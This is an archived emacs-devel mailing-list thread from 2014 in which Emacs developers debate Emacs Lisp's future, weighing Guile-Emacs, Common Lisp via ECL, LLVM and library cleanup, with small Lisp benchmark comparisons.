unofficial mirror of emacs-devel@gnu.org 
 help / color / mirror / code / Atom feed
* Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber
@ 2014-09-16 15:50 ` Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
                     ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-16 15:50 UTC (permalink / raw)
  To: Christopher Allan Webber; +Cc: emacs-devel

> So this email is partly a:
>  - What now?  What's the chance of work towards guilemacs moving over to
>    an official emacs git branch, and that port happening, anytime soon?
>  - Is anyone running it?  How's it going for you?

Good questions.  I've had the opportunity to think a bit more about
Emacs Lisp and its possible evolution and I'm still not sure what to
think about it.

I see a few different options for Emacs Lisp.

First, of course we can keep on evolving Elisp on its own.  This has
worked OK for the last 30 years, so it's not such a terrible choice.
The main problems I see with that:
- Elisp is slow and as CPUs aren't getting faster, its slowness makes itself
  noticed more often.
- Lack of some features, most notably FFI and concurrency.
- Lack of manpower.

This last point is for me the strongest motivation to try and move to
some other system, where we could use other people's work.

One such option is Guile-Emacs.  This presumably would give us a faster
implementation (at least in theory, their bytecode is significantly
more efficient), would give us an FFI, and would give us more manpower
since we'd be benefiting from the work done on Guile.

Note that while Guile does come with support for threading, it doesn't
immediately let us use concurrency in Guile-Emacs, because of all the
issues of synchronizing access to shared data, with all the existing
Emacs code (both C and Elisp) assuming that this problem doesn't exist.
IOW, language support for concurrency is just a first step on the way to
letting Emacs Lisp use concurrency.

Another detail that needs to be spelled out is the difference between
the language and its implementation.  Guile-Emacs provides 2 languages:
Emacs Lips and Scheme (well, it also provides a few more, but that's
not important).  Many people are thinking "cool, so I'll be able to
write extensions in Scheme", but I'm not sure defining Emacs as "this
editor that comes with N extensions languages" is a good idea.

One of the main reasons for Emacs's enduring success is its large set of
third party packages so obviously we can't drop support for Elisp any
time soon.  And as much as I like Scheme, I'm very much unconvinced that
it's really so much better that it's worth converting packages from
Elisp to Scheme.

So if we go for Guile-Emacs, we'll be stuck with Guile, i.e. we'd
have (old and new) packages that use Elisp, new packages that use
Scheme, maybe yet other new packages that use, say, Javascript (or some
other language support by Guile).  That would make the work of Emacs
(and GNU ELPA) maintenance harder.

And of course, if Guile's own manpower dries up, Emacs would be forced
to keep supporting Guile, which is more work than supporting just Elisp.

So, I think that ideally, we'd want to stick to Elisp, or some
evolution thereof.  Sadly, I don't see how to evolve Elisp into Scheme:
they are closely related languages, but the differences are large enough
that it seems hard to reconcile them.

The only standard language into which Elisp can evolve, AFAICT, is
Common Lisp.  [ Now some readers get disappointed, while some others
become excited.  ]  There are some incompatibilities between the two
languages, but I can imagine working them out over the years, or even
living with them without too much trouble, such that we could use
Common-Lisp libraries in Emacs.

Of course, that's for the language side, but on the implementation side,
I don't really know what Common-Lisp implementation we could re-use
(both GNU implementations are dormant, so there's no manpower for us
tap into).  Still: there are many Common-Lisp implementations out there,
so there's probably one that could work for us.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
@ 2014-09-16 16:03   ` Lennart Borgman
  2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-18  8:43     ` Emilio Lopes
  2014-09-16 16:09   ` Eli Zaretskii
  2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 2 replies; 261+ messages in thread
From: Lennart Borgman @ 2014-09-16 16:03 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Christopher Allan Webber, Emacs-Devel devel

[-- Attachment #1: Type: text/plain, Size: 582 bytes --]

On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier <monnier@iro.umontreal.ca>
wrote:

> The main problems I see with that:
> - Elisp is slow and as CPUs aren't getting faster, its slowness makes
> itself
>   noticed more often.
> - Lack of some features, most notably FFI and concurrency.
> - Lack of manpower.
>

Perhaps also the lack of possibility to enhance Emacs with code written in
other languages? I think for example that Javascript will be something most
future programmers will know. Could Guile make it easier to enhance Emacs
with Javascript (as an alternative to Elisp)?

[-- Attachment #2: Type: text/html, Size: 1152 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
@ 2014-09-16 16:09   ` Eli Zaretskii
  2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-16 16:09 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: cwebber, emacs-devel

> From: Stefan Monnier <monnier@iro.umontreal.ca>
> Date: Tue, 16 Sep 2014 11:50:54 -0400
> Cc: emacs-devel@gnu.org
> 
> One such option is Guile-Emacs.  This presumably would give us a faster
> implementation (at least in theory, their bytecode is significantly
> more efficient)

If by "bytecode" you mean the *.go files, then we should also keep in
mind that these are not architecture-independent as *.elc files are.
Not a catastrophe, of course, but something to remember.

> And of course, if Guile's own manpower dries up, Emacs would be forced
> to keep supporting Guile, which is more work than supporting just Elisp.

A data point: judging by "git log", Guile is currently developed and
maintained by about 3 active developers.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
  2014-09-16 16:09   ` Eli Zaretskii
@ 2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 0 replies; 261+ messages in thread
From: Lars Brinkhoff @ 2014-09-16 16:54 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:
> The only standard language into which Elisp can evolve, AFAICT, is
> Common Lisp.  [ Now some readers get disappointed, while some others
> become excited.  ]

Excited.

> [...] we could use Common-Lisp libraries in Emacs.

That's almost possible already, because there is a Common Lisp
implementation (say 90% complete) for Emacs, including a compiler from
CL to Elisp.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  2:57 Lally Singh
  2014-09-17 11:01 ` Tom
  2014-09-17 11:43 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17  2:57 UTC (permalink / raw)
  To: emacs-devel

[-- Attachment #1: Type: text/plain, Size: 447 bytes --]

So if this a runtime system issue, what about elisp on LLVM?  Let the LLVM
project handle the backend and performance issues, and emacs can maintain
one language frontend.  There are plenty of people working on that, so
emacs can ride that for almost free.

I'm assuming that there are reasons why it doesn't work, as someone
(apparently) did the work some time ago:
https://github.com/boostpro/emacs-llvm-jit  Perhaps it just needs a little
TLC?

[-- Attachment #2: Type: text/html, Size: 577 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  7:38 Kristian Nygaard Jensen
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
  2014-09-26 13:43 ` Robin Templeton
  0 siblings, 2 replies; 261+ messages in thread
From: Kristian Nygaard Jensen @ 2014-09-17  7:38 UTC (permalink / raw)
  To: emacs devel

 > Of course, that's for the language side, but on the implementation side,
 > I don't really know what Common-Lisp implementation we could re-use
 > (both GNU implementations are dormant, so there's no manpower for us
 > tap into).  Still: there are many Common-Lisp implementations out there,
 > so there's probably one that could work for us.

Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems 
alive, it is lgpl, so there would be no license issue

-- 

Kristian Nygaard Jensen




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  8:22 Nic Ferrier
  0 siblings, 0 replies; 261+ messages in thread
From: Nic Ferrier @ 2014-09-17  8:22 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier wrote:

> First, of course we can keep on evolving Elisp on its own.  This has
> worked OK for the last 30 years, so it's not such a terrible choice.
> The main problems I see with that:
> - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself
>   noticed more often.
> - Lack of some features, most notably FFI and concurrency.
> - Lack of manpower.
>
> This last point is for me the strongest motivation to try and move to
> some other system, where we could use other people's work.

I don't see that this is going to happen though. Emacs is an unusual
system. Moving the extension language to another community is just going
to cause more arguing along the lines of "this is how X lang does it" vs
"but we're Emacs and don't want to do it like that".

My view is we should improve the contribution process to get more
manpower for elisp. We have been doing that as a community. As a
reminder we have:

- adopted packaging allowing many more people to contribute pure elisp
- accepted a move to the most commonly used support tools (git, etc...)
- started to talk about changing the documentation format to a more
  common format

I see a new spirit of openness and willingness to change in the Emacs
community and it's really great.

I would implore you, my fellow emacs hackers, not to make too hasty a
decision on platform. Guile-Emacs may be cool, but if we can increase
developer diversity in Emacs through git and so on (I for one will be
contributing to the core thanks to this) then we may get all the
advantages of the Guile VM without having to go to Guile.

I'm sure there is more that we could do to get more man and woman
power. I hope that we consider those things as well as techy projects
like switching to Guile's VM.


Nic



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17  2:57 Lally Singh
@ 2014-09-17 11:01 ` Tom
  2014-09-17 11:43 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Tom @ 2014-09-17 11:01 UTC (permalink / raw)
  To: emacs-devel

Lally Singh <lally.singh <at> gmail.com> writes:

> 
> So if this a runtime system issue, what about elisp on LLVM?  Let the LLVM
project handle the backend and performance issues, and emacs can maintain
one language frontend.  There are plenty of people working on that, so emacs
can ride that for almost free.

In the long run this would be the most practical solution. Choosing
a well supported and widely used VM which gets  tons of developer 
attention, so the VM development would be taken care of, 
and Elisp could be implemented as a frontend.

This approach has the advantage of supporting the existing Elisp code
base and it would also make it possible to use other languages to extend
emacs, because widdely used VMs have frontend implementations for
many modern languages (Python, etc.)





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17  2:57 Lally Singh
  2014-09-17 11:01 ` Tom
@ 2014-09-17 11:43 ` Richard Stallman
  2014-09-17 14:21   ` Lally Singh
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-09-17 11:43 UTC (permalink / raw)
  To: Lally Singh; +Cc: emacs-devel

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

It is not acceptable to base a GNU package on LLVM.  It is a
non-copylefted competitor to an important GNU package.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 11:43 ` Richard Stallman
@ 2014-09-17 14:21   ` Lally Singh
  0 siblings, 0 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17 14:21 UTC (permalink / raw)
  To: rms; +Cc: emacs-devel

[-- Attachment #1: Type: text/plain, Size: 1431 bytes --]

Would DotGNU work?  Ignore C# and put in a elisp frontend.  The benefit
being that we can watch what the larger efforts are doing in those fronts,
and pick-and-choose the good ideas with little effort on our side.

DotGNU would get a boost of support from emacs, and it's a familiar enough
environment that a lot of programmers would be willing to go in and hack on
it.  They'd often already have transferrable experience on the proprietary
versions of DotGNU, but would be able to vent their innate need to hack on
dotgnu instead of the more proprietary versions.  Emacs has a huge user
footprint, and leveraging it to boost another project would help.
 Especially a project that rides rather close to a very popular proprietary
platform - that's a lot of hackers to harness.

On Wed, Sep 17, 2014 at 7:43 AM, Richard Stallman <rms@gnu.org> wrote:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
> It is not acceptable to base a GNU package on LLVM.  It is a
> non-copylefted competitor to an important GNU package.
>
> --
> Dr Richard Stallman
> President, Free Software Foundation
> 51 Franklin St
> Boston MA 02110
> USA
> www.fsf.org  www.gnu.org
> Skype: No way! That's nonfree (freedom-denying) software.
>   Use Ekiga or an ordinary phone call.
>
>

[-- Attachment #2: Type: text/html, Size: 1981 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
@ 2014-09-17 15:15 ` Stefan Monnier
  2014-09-17 16:15   ` James Cloos
  2014-09-26 13:43 ` Robin Templeton
  1 sibling, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 15:15 UTC (permalink / raw)
  To: Kristian Nygaard Jensen; +Cc: emacs devel

> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive,
> it is lgpl, so there would be no license issue

Indeed, it looks like it might be a good candidate.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
@ 2014-09-17 16:15   ` James Cloos
  2014-09-17 17:53     ` Stefan Monnier
  0 siblings, 1 reply; 261+ messages in thread
From: James Cloos @ 2014-09-17 16:15 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel

>>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes:

>> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive,
>> it is lgpl, so there would be no license issue

SM> Indeed, it looks like it might be a good candidate.

It is the lisp which sage supports (they have a funding grant which
requires that sage be installable from source on just about anything
which has an existing C compiler) and the maxima tests consistantly
show it as second only to compiled-to-machine-code lisps like sbcl.

As such, it looks like it will continue to have excellent development
and support for the foreseeable future.

-JimC
-- 
James Cloos <cloos@jhcloos.com>         OpenPGP: 0x997A9F17ED7DAEA6





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 16:15   ` James Cloos
@ 2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
                         ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 17:53 UTC (permalink / raw)
  To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel

> It is the lisp which sage supports (they have a funding grant which
> requires that sage be installable from source on just about anything
> which has an existing C compiler) and the maxima tests consistantly
> show it as second only to compiled-to-machine-code lisps like sbcl.
> As such, it looks like it will continue to have excellent development
> and support for the foreseeable future.

Sounds good.  If someone wants to look deeper into what it would take to
use ECL in Emacs, that would be very welcome.

There are lots of potential issues in such a project.
A start would be to check:
- does it use its own event loop?
- can it handle conservative stack scanning?
- what other conventions are needed for C code to cooperate with the GC?
- could we do something akin to our "dump"?

Of course, another issue with Common-Lisp integration is that we'd want
to figure out how to integrate the two languages.  So, we'd need to
investigate what are the current incompatibilities.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 16:03   ` Lennart Borgman
@ 2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-17 19:25       ` Lally Singh
  2014-09-18  2:07       ` Alexis
  2014-09-18  8:43     ` Emilio Lopes
  1 sibling, 2 replies; 261+ messages in thread
From: Jorgen Schaefer @ 2014-09-17 18:24 UTC (permalink / raw)
  To: emacs-devel

On Tue, 16 Sep 2014 18:03:17 +0200
Lennart Borgman <lennart.borgman@gmail.com> wrote:

> On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier
> <monnier@iro.umontreal.ca> wrote:
> 
> > The main problems I see with that:
> > - Elisp is slow and as CPUs aren't getting faster, its slowness
> > makes itself
> >   noticed more often.
> > - Lack of some features, most notably FFI and concurrency.
> > - Lack of manpower.
> >
> 
> Perhaps also the lack of possibility to enhance Emacs with code
> written in other languages? I think for example that Javascript will
> be something most future programmers will know. Could Guile make it
> easier to enhance Emacs with Javascript (as an alternative to Elisp)?

I think the (often-cited, not just here) idea of supporting multiple
languages is a red herring, mostly. Every extension language supported
adds some burden on those who want to understand what their editor
does, not just use pre-packaged code. One of the great things about
Emacs is that, once I know ELisp, I have a good chance of understanding
and modifying any extension I see. And learning Emacs Lisp is not
exactly hard.

But we do not have to be all theoretical here. There is an editor which
supports a dozen extension languages. The paradoxical thing to notice
when you look at vim plugins is that most of them are written in VimL,
including rather complex ones like NERD-tree and fugitive. I'd argue
that VimL is a tiny bit harder to learn and use than ELisp. There are
various reasons for why most plugins are written in it, but I do think
that this is a pretty good indicator that the lack of "common" languages
for extension is not exactly high on the list of problems for an editor.

There are plenty of things in ELisp itself that I'd put much higher on
that list.

- Lack of a common structured datatype. While there's cl-defstruct, the
  support is a bit limited (C-h f does not work well with it), and a
  lot of code simply does not use it, making it seem a bit like a
  red-haired stepchild instead of a core recommended language feature.
  Alists and plists are usually used where modern languages would use
  structured datatypes, or even some hack with cons cells or lists and
  indexed access.
- Hashes are one of those data types that are used all over the place
  in other languages, but you see them rarely in Emacs Lisp, again often
  losing out to alists and plists. This might be related to the
  standard library functions being a bit baroque. (There's some
  third-party hash library somewhere.)
- Speaking of third-party libraries, s.el, dash.el and f.el provide
  things that really ought to be in core Emacs.
- The regex engine is annoying to use. Providing some interface to PCRE
  would be a great step forward, and does not even have to be
  backwards-incompatible.
- There are tons of warts in Emacs Lisp. nth vs. elt for example,
  with their exciting incompatible calling conventions.

One thing I think would benefit Emacs Lisp as a language a lot would be
a standard library cleanup. An effort to go through the libraries that
come with Emacs, separate them into "standard library" and "extensions
that come with Emacs", and then go through the "standard library",
provide sane names when necessary (like setcar is provided for rplaca)
and deprecating the old ones, or simply deprecate all but one version of
functions with overlapping use (nth or elt, pick one). Finally, add
standard libraries for common functionality that is currently lacking
(see above).

The next step would be going through the "extensions that come with
Emacs" and make sure they all use namespace prefixes for anything but
very specific commands meant for users to use with M-x. Only standard
library functions are allowed to be namespace-free.

These things would make Emacs Lisp a lot easier to use and also easier
to learn for new users.

This is all doable, but it needs manpower (#3 on Stefans list). Which
is manpower that would not be doing other cool stuff on Emacs.

Regards,
Jorgen



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 18:24     ` Jorgen Schaefer
@ 2014-09-17 19:25       ` Lally Singh
  2014-09-18  2:07       ` Alexis
  1 sibling, 0 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17 19:25 UTC (permalink / raw)
  To: Jorgen Schaefer; +Cc: emacs-devel

[-- Attachment #1: Type: text/plain, Size: 2045 bytes --]

On Wed, Sep 17, 2014 at 2:24 PM, Jorgen Schaefer <forcer@forcix.cx> wrote:

> On Tue, 16 Sep 2014 18:03:17 +0200
> Lennart Borgman <lennart.borgman@gmail.com> wrote:
> > Perhaps also the lack of possibility to enhance Emacs with code
> > written in other languages? I think for example that Javascript will
> > be something most future programmers will know. Could Guile make it
> > easier to enhance Emacs with Javascript (as an alternative to Elisp)?
>
> I think the (often-cited, not just here) idea of supporting multiple
> languages is a red herring, mostly. Every extension language supported
> adds some burden on those who want to understand what their editor
> does, not just use pre-packaged code. One of the great things about
> Emacs is that, once I know ELisp, I have a good chance of understanding
> and modifying any extension I see. And learning Emacs Lisp is not
> exactly hard.
>

I think a policy of "if written for emacs, do it in elisp" is a good one,
but let's acknowledge the advantage of easy linking/calling into other code
bases that may come with having a multi-language-compatible runtime system.
 I'm sure we've all seen some systems that we'd love to invoke directly
from elisp.


> [snipping some very good points]

One thing I think would benefit Emacs Lisp as a language a lot would be
> a standard library cleanup. An effort to go through the libraries that
> come with Emacs, separate them into "standard library" and "extensions
> that come with Emacs", and then go through the "standard library",
> provide sane names when necessary (like setcar is provided for rplaca)
> and deprecating the old ones, or simply deprecate all but one version of
> functions with overlapping use (nth or elt, pick one). Finally, add
> standard libraries for common functionality that is currently lacking
> (see above).
>

I completely agree that there's plenty of work needed there, but:
 - If staying with elisp, this is a separate discussion
 - If not staying with elisp, these problems can be addressed during
conversion.

[-- Attachment #2: Type: text/html, Size: 2850 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
@ 2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
                           ` (2 more replies)
  2014-09-18 18:59       ` Johan Bockgård
  2014-09-18 21:01       ` Sam Steingold
  2 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 21:46 UTC (permalink / raw)
  To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel

>> It is the lisp which sage supports (they have a funding grant which
>> requires that sage be installable from source on just about anything
>> which has an existing C compiler) and the maxima tests consistantly
>> show it as second only to compiled-to-machine-code lisps like sbcl.

Note that this speed is probably only for "compiled code".
ECL has two evaluation methods:
- "byte-code interpreter".
- "compilation to native code via C" (requires a local installation of
  a C compiler).

I just tried a silly microbenchmark to get an idea of the byte-code
interpreter's performance:

   (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x))

and on my machine, it took 3.5s compared.  This isn't super-fast
compared to Emacs-24.3 which takes 6.7s in the purely interpreted case
and 1.7s in the byte-compiled case.

Of course, this is a silly benchmark, but I think this indicates that
ECL focuses on performance of compiled code (the above silly code runs
in 0.7s when compiled, FWIW).


        Stefan





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
@ 2014-09-18  1:09         ` James Cloos
  2014-09-18  7:12         ` Helmut Eller
  2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: James Cloos @ 2014-09-18  1:09 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel

>>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes:

SM> Note that this speed is probably only for "compiled code".

I hadn't realized that ecls compiled the lisp, and as you suspected
maxima's install routine does compile itself when using ecls, just as
it does when using sbcl.

But it would be cool to have elisp compiled to fasl files.  The main
code could be compiled and linked as a library, rather than dumped.

-JimC
-- 
James Cloos <cloos@jhcloos.com>         OpenPGP: 0x997A9F17ED7DAEA6



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-17 19:25       ` Lally Singh
@ 2014-09-18  2:07       ` Alexis
  1 sibling, 0 replies; 261+ messages in thread
From: Alexis @ 2014-09-18  2:07 UTC (permalink / raw)
  To: emacs-devel


Jorgen Schaefer writes:

> I think the (often-cited, not just here) idea of supporting multiple
> languages is a red herring, mostly. Every extension language supported
> adds some burden on those who want to understand what their editor
> does, not just use pre-packaged code. One of the great things about
> Emacs is that, once I know ELisp, I have a good chance of
> understanding and modifying any extension I see.

+1. It seems to me that much discussion around this issue focuses on
being able to use one's favourite language to extend Emacs, without
considering what it might be like to:

* start using an extension that seems like it might significantly assist
  one's productivity;
* find a show-stopping bug in it; and
* discover that the extension is written in a programming language one
  loves to loathe.

Also, to an (admittedly very limited) extent, it's /already/ possible to
use a number of languages other than ELisp in Emacs, for at least some
things, via org-babel:

http://orgmode.org/manual/Evaluating-code-blocks.html#Evaluating-code-blocks

A list of languages currently supported by org-babel can be found at:

http://orgmode.org/manual/Languages.html#Languages

i would be interested to know what experiences people might have had in
using org-babel as part of an Emacs extension ....

> Speaking of third-party libraries, s.el, dash.el and f.el provide
> things that really ought to be in core Emacs.

Agreed. i've found it quite surprising that simple functions like
-flatten and s-repeat aren't available in ELisp by default.

> The regex engine is annoying to use. Providing some interface to PCRE
> would be a great step forward, and does not even have to be
> backwards-incompatible.

i like this suggestion. i'm rather comfortable with Perl5 REs, and can
find myself frustrated trying to create REs in ELisp. Having said that,
the issue is not usually the syntax of ELisp REs per se (e.g. needing to
escape things like capturing parentheses or the alternatives pipe); it's
needing to escape various things /further/ because REs can only be
specified in the form of a standard ELisp string. On several occasions
i've ended up using a combination of pcre-to-elisp and re-builder to try
to work out if the problem is too few backslashes, too many backslashes,
or both.


Alexis.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
@ 2014-09-18  7:12         ` Helmut Eller
  2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: Helmut Eller @ 2014-09-18  7:12 UTC (permalink / raw)
  To: emacs-devel

On Wed, Sep 17 2014, Stefan Monnier wrote:

>>> It is the lisp which sage supports (they have a funding grant which
>>> requires that sage be installable from source on just about anything
>>> which has an existing C compiler) and the maxima tests consistantly
>>> show it as second only to compiled-to-machine-code lisps like sbcl.
>
> Note that this speed is probably only for "compiled code".

The story that I've heard is that Maxima uses primarily GCL (not ECL,
though it would also work in ECL and other CLs) and that GCL is fast in
that case because Maxima uses old-fashioned idioms a lot, like EVAL all
over the place.

The last thing I've heard of ECL is that it's searching a new maintainer
because the current one can no longer use it at work (university context
where the Lisp using project has ended).  There's also a fork of ECL
called MKCL with supposedly better multithreading.

Just saying, because ECL is apparently also short on man power.

Helmut




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
  2014-09-18  7:12         ` Helmut Eller
@ 2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: Thorsten Jolitz @ 2014-09-18  7:46 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> I just tried a silly microbenchmark to get an idea of the byte-code
> interpreter's performance:
>
>    (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x))
>
> and on my machine, it took 3.5s compared.  This isn't super-fast
> compared to Emacs-24.3 which takes 6.7s in the purely interpreted case
> and 1.7s in the byte-compiled case.

I could not resist to compare this with my favorite 'pure and powerful'
(and interpreted) PicoLisp:

,----
| : (bench (let X 0 (for I 10000000 (setq X (- I X))) X))
| 0.338 sec
| -> 5000000
`----

while the Emacs Lisp version on my machine yields:

,----
| : (benchmark-run nil (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x))
`----

-> (3.5045056839999997 0 0.0)

See 

,----
| http://picolisp.com/wiki/?PILvsEL 
`----

for more speed comparisons between PicoLisp and Emacs Lisp.

-- 
cheers,
Thorsten




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 16:03   ` Lennart Borgman
  2014-09-17 18:24     ` Jorgen Schaefer
@ 2014-09-18  8:43     ` Emilio Lopes
  1 sibling, 0 replies; 261+ messages in thread
From: Emilio Lopes @ 2014-09-18  8:43 UTC (permalink / raw)
  To: Emacs-Devel devel

2014-09-16 18:03 GMT+02:00 Lennart Borgman <lennart.borgman@gmail.com>:
> Perhaps also the lack of possibility to enhance Emacs with code written in
> other languages? I think for example that Javascript will be something most
> future programmers will know. Could Guile make it easier to enhance Emacs
> with Javascript (as an alternative to Elisp)?

"It's nice that the students coming to us already know Java.  We just
have to teach them how to program."

                -- Michael Sperber



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
@ 2014-09-18 18:59       ` Johan Bockgård
  2014-09-18 21:01       ` Sam Steingold
  2 siblings, 0 replies; 261+ messages in thread
From: Johan Bockgård @ 2014-09-18 18:59 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Sounds good.  If someone wants to look deeper into what it would take to
> use ECL in Emacs, that would be very welcome.

You could try asking ECL's author,

http://article.gmane.org/gmane.lisp.ecl.general/345



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18 18:59       ` Johan Bockgård
@ 2014-09-18 21:01       ` Sam Steingold
  2014-09-19  0:56         ` Stefan Monnier
  2 siblings, 1 reply; 261+ messages in thread
From: Sam Steingold @ 2014-09-18 21:01 UTC (permalink / raw)
  To: emacs-devel

> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
>
> Of course, another issue with Common-Lisp integration is that we'd
> want to figure out how to integrate the two languages.  So, we'd need
> to investigate what are the current incompatibilities.

Running ELisp code in CL has been supported for 15 years.
http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp

-- 
Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265
http://www.childpsy.net/ http://palestinefacts.org http://iris.org.il
http://memri.org http://truepeace.org http://openvotingconsortium.org
Lottery is a tax on statistics ignorants.  MS is a tax on computer-idiots.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-18 21:01       ` Sam Steingold
@ 2014-09-19  0:56         ` Stefan Monnier
  2014-09-19 12:24           ` Sam Steingold
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-19  0:56 UTC (permalink / raw)
  To: Sam Steingold; +Cc: emacs-devel

>> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
